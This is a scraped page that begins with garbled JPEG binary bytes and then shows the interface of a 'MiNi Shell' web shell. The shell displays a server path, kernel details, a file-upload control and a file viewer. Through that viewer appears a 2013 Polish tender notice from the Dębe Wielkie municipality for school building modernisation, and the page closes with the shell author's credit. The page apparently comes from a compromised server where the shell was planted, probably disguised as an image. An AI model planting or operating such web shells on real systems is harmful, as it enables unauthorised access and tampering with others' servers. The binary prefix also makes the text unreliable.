JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130320/111328-N-2013.html

<p class="kh_header"><b>Dębe Wielkie: Modernizacja budynku gimnazjum w miejscowości Dębe Wielkie</b><br>
<b>Numer ogłoszenia: 111328 - 2013; data zamieszczenia: 20.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Dębe Wielkie , ul. Strażacka 3, 05-311 Dębe Wielkie, woj. mazowieckie, tel. 025 7564700, faks 025 7564734.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.debewielkie</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja budynku gimnazjum w miejscowości Dębe Wielkie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
Przedmiotem zamówienia jest modernizacja budynku gimnazjum w miejscowości Dębe Wielkie.Zakres rzeczowy:Szczegółowy zakres wykonania określa:
Projekt budowlany (tj. Dokumentacja inwentaryzacyjno  projektowa budynku gimnazjum położonego na działce o nr ewid. 992 na 2 w miejscowości Dębe Wielkie, gmina Dębe Wielkie) opracowany przez BATRO Barbara Trojanowska  architekt, z siedzibą Stojadła ul. Mińska 38B, 05-300 Mińsk Mazowiecki; Przedmiar robót  pomocniczo do wyceny wartości robót; Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych. UWAGA: Projekt budowlany (tj. Dokumentacja inwentaryzacyjno  projektowa budynku gimnazjum położonego na działce o nr ewid. 992 na 2 w miejscowości Dębe Wielkie, gmina Dębe Wielkie) obejmuje szerszy zakres niż zostało to ujęte w niniejszym postępowaniu przetargowym, dlatego też dla właściwego przygotowania oferty należy wziąć pod uwagę zakres opisany poniżej, a także w oparciu o przedmiar robót o którym mowa w Rozdziale nr IV SIWZ. Przedmiot niniejszego postępowania przetargowego obejmuje wykonanie robót w budynku gimnazjum położonego na działce o nr ewid. 992 na 2 w miejscowości Dębe Wielkie, gmina Dębe  Wielkie wskazanych w projekcie budowlanym (tj. Dokumentacji inwentaryzacyjno  projektowej budynku gimnazjum) w następującym zakresie: likwidację pęknięć i zarysowań; montaż okien i drzwi na klatkach schodowych wraz z robotami towarzyszącymi; wydzielenie łazienki dla osób niepełnosprawnych i remont łazienki na piętrze; wykonanie prac w pomieszczenie gospodarczym w piwnicy; wymianę drzwi wewnętrznych i zewnętrznych wraz z robotami towarzyszącymi; odtworzenie, oczyszczenie i wykonanie nowych kanałów wentylacyjnych; wykonanie instalacji oddymiania 2 klatek schodowych; uzupełnienie oświetlenia ewakuacyjnego;
dostawa i montaż kurtyny powietrznej;wykonanie robót branży sanitarnej;
dostawa schodołazu. Likwidacja pęknięć i zarysowań. Roboty związane z naprawą pęknięć i zarysowań należy prowadzić zgodnie z ekspertyzą techniczną opracowaną przez p. Bogusława Kowalczyka stanowiącą integralna część opracowania projektowego.Na każdym etapie prowadzonych robót, a przede wszystkim: po odkuciu tynków w miejscach zarysowań; po zamocowaniu zbrojenia;
należy uzyskać akceptację Inspektora Nadzoru dla kontynuowania prac. Montaż okien i drzwi na klatkach schodowych wraz z robotami towarzyszącymi. 
Roboty związane z montażem okien i drzwi na klatkach schodowych: 
wykucie istniejących okien i drzwi do wymiany lub do przeniesienia;
demontaż ścianek i poszerzenie otworów do wymaganych nowymi wymiarami stolarki we fragmentach wskazanych w projekcie budowlanym;
zamurowanie fragmentów ścian w związku ze zmianą wymiarów stolarki; 
zamontowanie okien i drzwi o odporności ogniowej wg projektu budowlanego, do montażu wykorzystać kotwy stalowe i uszczelnić pianą o właściwościach ppoż.; 
naprawa posadzek po zdemontowanych ścianach, wykuciach i poszerzeniach otworów; uzupełnić obróbki tynkarskie na zewnątrz i wewnątrz po wymianie okien i drzwi; wymienić parapety zewnętrzne i wewnętrzne; przetrzeć pozostałe tynki ścian, stropów i biegów klatek schodowych, a następnie pomalować w kolorze uzgodnionym z Inwestorem.Wydzielenie łazienki dla osób niepełnosprawnych i remont łazienki na piętrze: demontaż istniejących elementów sanitarnych  elementy do ponownego wykorzystania; wykucie i demontaż wskazanych drzwi; 
demontaż ścianek i poszerzenie otworów do wymaganych nowymi wymiarami stolarki we fragmentach wskazanych w projekcie budowlanym;
wykonanie nowego nadproża nad drzwiami wejściowymi wg projektu konstrukcyjnego; uzupełnić obróbki tynkarskie na zewnątrz i wewnątrz po wymianie okien i drzwi; naprawa posadzek po zdemontowanych ścianach, wykuciach i poszerzeniach otworów; wykonanie elementów ścianek gk poprzez wydzielenie pomieszczenia łazienki dla osób niepełnosprawnych, wykonanie nowych ścianek w pomieszczeniu łazienki chłopców i na piętrze jako wypełnienie ścianki użyć mat z wełny mineralnej gr. 10 cm, płyty gk wodoodporne zielone gr. 12,5 mm mocowane obustronnie, na połączeniach z posadzką, sufitem i ścianami zastosować taśmy dylatacyjne, otwory w drzwiach gk wykonać za pomocą profili drzwiowych);
wykonanie glazury na zaprawie klejowej do wysokości 2,0 metrów w łazience dla osób niepełnosprawnych i pasa szerokości 60 cm na ścianie w łazience dla chłopców w miejscu montażu umywalek, po uprzednim zagruntowaniu ścian folią w płynie; wykonanie posadzki z płytek gres antypoślizgowych na zaprawie klejowej w łazienkach po uprzednim zagruntowaniu posadzki folią w płynie; 
obsadzenie nowych drzwi wg PT;w łazience dla osób niepełnosprawnych zamontować uchwyty dla ON (stały i uchylny); wyrównanie nierówności pozostałych ścian łazienek i pomalowanie w kolorze uzgodnionym z Inwestorem.
Roboty w pomieszczeniu gospodarczym:  wykucie istniejących drzwi do wymiany lub do przeniesienia;uzupełnić obróbki tynkarskie na zewnątrz i wewnątrz po wymianie drzwi;wydzielenie pomieszczenia za pomocą ścianki gk (jako wypełnienie ścianki użyć mat z wełny mineralnej gr. 10 cm, płyty gk wodoodporne zielone gr. 12,5 mm mocowane obustronnie, na połączeniach z posadzką, sufitem i ścianami zastosować taśmy dylatacyjne, otwory w drzwiach gk wykonać za pomocą profili drzwiowych); montaż drzwi typu harmonijkowego; naprawa posadzek i tynków po robotach instalacyjnych; wyrównanie nierówności pozostałych ścian i pomalowanie w kolorze uzgodnionym z Inwestorem. Wymiana drzwi wewnętrznych i zewnętrznych wraz z robotami towarzyszącymi: wykucie istniejących drzwi do wymiany lub do przeniesienia; demontaż ścianek i poszerzenie otworów do wymaganych nowymi wymiarami stolarki we fragmentach wskazanych w projekcie budowlanym; zamurowanie fragmentów ścian w związku ze zmianą wymiarów stolarki; wykonanie nadproży wg projektu konstrukcyjnego;
zamontowanie drzwi o odporności ogniowej wg projektu budowlanego, do montażu wykorzystać kotwy stalowe i uszczelnić pianą o właściwościach ppoż.; 
zamontowanie drzwi wewnętrznych drewnopochodnych oraz zewnętrznych aluminiowych wg charakterystyki zawartej w PT; naprawa posadzek po zdemontowanych ścianach, wykuciach i poszerzeniach otworów;
uzupełnić obróbki tynkarskie po wymianie drzwi; pomalować fragmenty ścian bezpośrednio sąsiadujące z wymienianymi drzwiami w kolorze uzgodnionym z Inwestorem. Odtworzenie, oczyszczenie i wykonanie nowych kanałów wentylacyjnych, dokonać przeglądu istniejących kominów wentylacyjnych;
sprawdzić drożność przewodów, w przypadku stwierdzenia jej braku kominy oczyści (odgruzować);w miejscu demontowanych hydrantów odtworzyć przebieg kominów; 
w miejscach wskazanych w projekcie wykonać przebicia i fragmenty nowych kominów;wyloty w ścianach zakończyć kratkami wentylacyjnymi; 
po wykonaniu wszystkich prac dokonać odbioru kominów przez uprawnionego mistrza kominiarskiego, protokół załączyć do dokumentacji powykonawczej.
Wykonanie instalacji oddymiania klatek schodowych instalacje oddymiania klatek schodowych wykonać jako podtynkowe w bruzdach przewodami wg projektu instalacji elektrycznej;wszystkie urządzenia wchodzące w skład ww instalacji (przede wszystkim centralki, czujki, przyciski, klapa, okno) muszą pochodzić od jednego producenta i posiadać wszystkie niezbędne certyfikaty wymagane przepisami;po zakończeniu wszystkich prac przeprowadzić w obecności Inspektora Nadzoru i Inwestora sprawdzenie działania obydwu systemów i spisać odpowiedni protokół pokontrolny (charakterystyka elementów systemu wg projektu technicznego branży elektrycznej). Uzupełnienie oświetlenia ewakuacyjnego 
doprowadzić podtynkowo przewody elektryczne w miejsce montażu opraw ewakuacyjnych;zamontować oprawy natynkowe; 
po zakończeniu wszystkich prac przeprowadzić w obecności Inspektora Nadzoru i Inwestora przeprowadzić testy działania w przypadku zaniku napięcia;
przedstawić protokoły z pomiarami wykonane przez osoby posiadające stosowne uprawnienia wraz z metryką urządzeń pomiarowych i dołączyć do dokumentacji powykonawczej (charakterystyka przewodów i opraw wg projektu technicznego branży elektrycznej).Dostawa i montaż kurtyny powietrznej 
doprowadzić podtynkowo przewód zasilający;zamontować nad drzwiami głównymi kurtynę powietrzną o długości 140 cm  kurtyna musi posiadać min. 36 miesięczną gwarancję producenta.Wykonanie robót sanitarnych 
szczegółowy zakres prac został przedstawiony w projekcie technicznym branży sanitarnej;elementy białego montażu (umywalki, baterie, WC) demontować ostrożnie do ponownego montażu w miejscach wskazanych w PT;
ostateczne miejsce montażu osprzętu nowego w pomieszczeniu gospodarczym i kotłowni uzgodnić z Inwestorem po przystąpieniu do robót;
po wymianie hydrantów przeprowadzić próby działania nowych urządzeń protokoły z pomiarami wykonane przez osoby posiadające stosowne uprawnienia wraz z metryką urządzeń pomiarowych dołączyć do dokumentacji powykonawczej.
(charakterystyka montowanych elementów wg projektu technicznego branży sanitarnej) Dostawa schodołazu dostarczyć schodołaz typu LIFTKAR UNI lub równoważny o nie gorszej charakterystyce  urządzenie musi posiadać min. 36 miesięczną gwarancję producenta..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego do zamówienia podstawowego, zgodnie z art. 67. ust. 1 pkt. 5 i 6 ustawy pzp w zakresie obejmującym przedmiot zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.33.00.00-9, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca będzie dysponował Kierownikami budowy, uprawnionych do kierowania robotami budowlanymi odpowiednio w specjalności konstrukcyjno - budowlanej, w specjalności sanitarnej i w specjalności elektrycznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Pzp, kosztorys ofertowy,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić w następujących przypadkach:
Zmian nie dotyczących treści oferty, na podstawie której dokonano wyboru Wykonawcy;
Zmian korzystnych dla Zamawiającego (np. z powodu możliwości uzyskania dodatkowych środków pozabudżetowych), których konieczność wprowadzenia wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy;
Przesunięcia terminu wykonania przedmiotu umowy ze względu na konieczność wykonania robót dodatkowych, o ile nie jest możliwe równoległe wykonywanie robót;
Dopuszczalnej prawem zmiany stron umowy lub oznaczenia stron umowy;
Zmiany wynagrodzenia w następstwie zmiany przepisów o podatku od towarów i usług (VAT);
Zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa.

Zamawiający dopuszcza również możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy w zakresie:
terminu zakończenia realizacji robót na uzasadniony wniosek Wykonawcy pod warunkiem, że zmiana ta nie wynika z winy Wykonawcy oraz których Wykonawca nie mógł przewidzieć na etapie składania oferty;
zmiany kierownika budowy oraz kierowników robót na innego spełniającego wymagania określone w niniejszej SIWZ - w uzasadnionym przypadku;
innych istotnych zmian wynikających ze zmiany przepisów prawa, jeżeli będą miały wpływ na przedmiot zamówienia.

 Strona występująca o zmianę postanowień umowy zobowiązana jest do udokumentowania zaistnienia okoliczności ,o których mowa wyżej. Wniosek o zmianę postanowień umowy musi być wyrażony na piśmie.

Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.debewielkie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dębe Wielkie
ul. Strażacka 3
05-311 Dębe Wielkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2013 godzina 10:00, miejsce: Urząd Gminy Dębe Wielkie
ul. Strażacka 3
05-311 Dębe Wielkie
pokój 34 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com